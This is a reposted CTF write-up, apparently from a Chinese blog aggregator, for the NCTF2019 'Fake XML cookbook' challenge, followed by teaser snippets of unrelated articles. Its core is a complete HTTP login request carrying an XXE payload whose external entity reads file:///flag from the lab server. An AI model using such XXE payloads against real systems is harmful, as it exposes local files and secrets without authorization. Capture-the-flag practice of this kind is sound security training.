[NCTF2019]Fake XML cookbook-编程知识

[NCTF2019]Fake XML cookbook

news/2025/2/13 10:35:44/文章来源:https://www.cnblogs.com/imtaieee/p/18578962

题目链接：[NCTF2019]Fake XML cookbook。

打开题目后，环境如下。

随便发送一个登陆包后，查看请求包与响应包。

尝试 XXE。

POST /doLogin.php HTTP/1.1
Host: f2f80df1-2df7-4b45-a1da-b06e22a5b17a.node5.buuoj.cn:81
Content-Length: 155
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.155 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://f2f80df1-2df7-4b45-a1da-b06e22a5b17a.node5.buuoj.cn:81
Referer: http://f2f80df1-2df7-4b45-a1da-b06e22a5b17a.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive<?xml version="1.0" ?>
<!DOCTYPE feng [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user><username>&file;</username><password>1</password>
</user>

得到 flag。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/844291.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

9.2

import pandas as pd import scipy.stats as stats data = pd.read_excel(9.2.xlsx) data_values = data.values.flatten().tolist() statistic, p_value = stats.shapiro(data_values) print("Shapiro-Wilk 统计量：", statistic) print("p 值：", p_valu…

Java日志手机号脱敏工具类

背景在开发过程中，很容易将用户敏感信息，例如手机号码、身份证等，打印在日志平台。为了保护用户数据，又不影响日志的打印，需要将日志中的敏感信息进行脱敏。效果没看明白，强烈建议 pull项目，执行一下项目中SensitiveUtils#main方法。特性支持多层级Json/对象字段脱敏支…

SSM项目出现的依赖问题

在ssm项目中，整合后，依赖出现问题导致出现了一堆bug 例如：Controller扫描不到、TomCat启动时报错Listener一个或多个启动失败、spring配置文件找不到、TomCat启动时提示启动XXX功能失败诸如此类一堆问题。。。。找了很久发现是依赖的问题，项目使用的依赖过多，把之前项目…

高级语言程序设计第九次作业

这个作业属于哪个课程：https://edu.cnblogs.com/campus/fzu/2024C/ 这个作业要求在哪里： https://edu.cnblogs.com/campus/fzu/2024C/homework/13311 学号：092300125 姓名：张天荣 14.17 3. struct Month {char name[12];char nmee2[4];int day;int id; };#include <stdi…

linux安装intel编译器2018

加压软件/public/download/parallel_studio_2018.tgz进入目录后用./install.sh开始安装按回车这个选择1，然后需要输入lic激活文件路径。安装完成后添加PATH到环境变量中 1、如果是普通用户，在用户的.bashrc里面添加 2、如果是root用户，在/etc/profile文件的最后一行添加 …

AGC 069

D. Tree and Intervals 感觉这个题可做啊，真该先开这个题的/fn \(x_i\) 可以看作一端 \(\le i\)，另一端 \(>i\) 的边数，进一步可以转化为：把 \(\le i\) 的点染成黑色，\(>i\) 的点染成白色，得到的总连通块数。考虑判定怎样的“总连通块数”序列是可以被生成的。一…

基于特征子空间的高维异常检测：一种高效且可解释的方法

本文将重点探讨一种替代传统单一检测器的方法：不是采用单一检测器分析数据集的所有特征，而是构建多个专注于特征子集(即子空间)的检测器系统。在表格数据的异常检测实践中，我们的目标是识别数据中最为异常的记录，这种异常性可以相对于同一数据集中的其他记录衡量，也可以相…

【机器学习算法】XGBoost原理

一、基本内容基本内容：GBDT的基础上，在损失函数上加入树模型复杂度的正则项与GBDT一样，也是使用新的弱学习器拟合残差（当前模型负梯度，残差方向）GBDT损失函数\[Loss = \sum_{i=1}^{N}L(y_i, y_i^{t}) \] XGboost损失函数\[Loss = \sum_{i=1}^{S}L(y_i, y_i^{t}) + \sum_{…

《网络与系统攻防技术》实验七

1.实验内容及要求本实践的目标理解常用网络欺诈背后的原理，以提高防范意识，并提出具体防范方法。具体实践有（1）简单应用SET工具建立冒名网站（2）ettercap DNS spoof （3）结合应用两种技术，用DNS spoof引导特定访问到冒名网站。二、实验过程（一）简单应用SET工具建…

HCIP-04 交换高级技术

VLAN聚合通过配置Super-VLAN和Sub-VLAN，不同Sub-VLAN之间进行通信，需要Super-VLAN开启ARP代理。 VLAN聚合既避免了由于子网划分带来的网络地址规划复杂的问题，又能够实现通过VLAN隔离不同广播域的目的。 • MUX VLAN包括Principal VLAN和Subordinate VLAN，同时Subordinate …

基于Jenkins构建微服务发布平台-2

基于Jenkins构建微服务发布平台-2 续——基于Jenkins构建微服务发布平台-1 4 流水线自动发布微服务项目 4.4 Docker阿里云镜像加速失效解决方案在所有节点上执行。# tee /etc/docker/daemon.json <<-EOF{ "registry-mirrors": [ "https://do.nar…

九种常见二维插值方法及双线性插值的理解

九种常见二维插值方法概述在数据分析、计算机视觉和图形处理等领域，插值是一种重要的技术，用于估算在已知数据点之间的未知值。以下是几种常用的插值方法的详细介绍。 1. 双线性插值 (Bilinear Interpolation) 双线性插值是一种在二维直线网格上进行插值的技术。它首先在一个…

[NCTF2019]Fake XML cookbook

相关文章